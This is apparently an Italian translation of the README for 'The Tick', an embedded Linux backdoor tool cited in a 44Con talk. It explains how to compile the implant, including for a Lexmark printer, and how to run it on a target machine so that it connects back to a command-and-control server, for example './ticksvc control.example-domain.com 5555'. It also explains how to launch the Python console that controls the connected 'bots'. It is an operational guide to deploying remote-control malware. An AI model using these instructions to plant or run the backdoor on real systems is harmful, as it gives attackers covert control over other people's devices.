
A simple embedded Linux backdoor.
Una semplice backdoor Linux embedded.

The Tick dipende solo da libcurl, quindi assicurati di avere il pacchetto di sviluppo corrispondente. Ad esempio, sulle distribuzioni basate su Debian dovresti fare quanto segue:
sudo apt-get install libcurl-dev
Una volta installate le dipendenze, esegui semplicemente il makefile:
cd src
make clean
make
Una volta che il comando "make" è stato eseguito completamente, il binario compilato si trova nella cartella "bin". Questo è il binario che devi eseguire sulla macchina target per controllarla da remoto.
Quando si effettua la cross-compilazione per piattaforme supportate, la risoluzione delle dipendenze e la compilazione vengono eseguite automaticamente. Attualmente l'unica piattaforma di cross-compilazione supportata è la stampante Lexmark CX310DN, ma in seguito verranno aggiunti altri dispositivi. Consulta il makefile per maggiori dettagli.
La console di comando e controllo è scritta in Python e quindi non necessita di compilazione.
Ottenere la persistenza sulla backdoor dipende fortemente dalla piattaforma target e pertanto non è documentato qui.
Sulla macchina target, esegui il binario della backdoor con i seguenti argomenti:
./ticksvc ADDR PORT
Dove "ADDR" e "PORT" devono essere sostituiti con l'indirizzo IP e la porta in cui la console di comando e controllo sarà in ascolto. La porta predefinita è 5555.
La console di comando e controllo non richiede installazione, ma potrebbe avere dipendenze non risolte. Esegui il seguente comando per assicurarti che tutte le dipendenze siano installate correttamente (nota: questo non richiede sudo):
pip install --upgrade -r requirements.txt
Nella maggior parte degli ambienti desktop Linux, il seguente file "Tick.desktop" creerà un'icona su cui puoi fare doppio clic per eseguire la console:
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/
La posizione esatta del file Tick.desktop può variare tra le distribuzioni Linux, ma in generale posizionarlo sul desktop dovrebbe funzionare. Assicurati di modificare il percorso con la posizione in cui hai scaricato The Tick (/opt/thetick nell'esempio precedente).
Per eseguire il binario della backdoor sulla piattaforma target, imposta l'hostname e la porta del server di controllo come opzioni della riga di comando. Ad esempio:
./ticksvc control.example-domain.com 5555
Sul server di controllo, potresti voler eseguire la console all'interno di un'istanza di GNU screen o simile:
sudo apt-get install screen
screen -S thetick ./thetick.py
In questo modo puoi scollegarti dalla console premendo Control+A seguito da D. Puoi tornare alla console in seguito in questo modo:
screen -r thetick
La console ti avviserà quando un nuovo bot si connette. Usa il comando "bots" per mostrare i bot attualmente connessi e il comando "use" per selezionare un bot con cui lavorare. Il comando "help" mostra il manuale utente.
Ecco alcune schermate che illustrano di cosa è capace la console:


The Tick è stato menzionato nella seguente presentazione alla 44Con di Daniel Romero e Mario Rivas: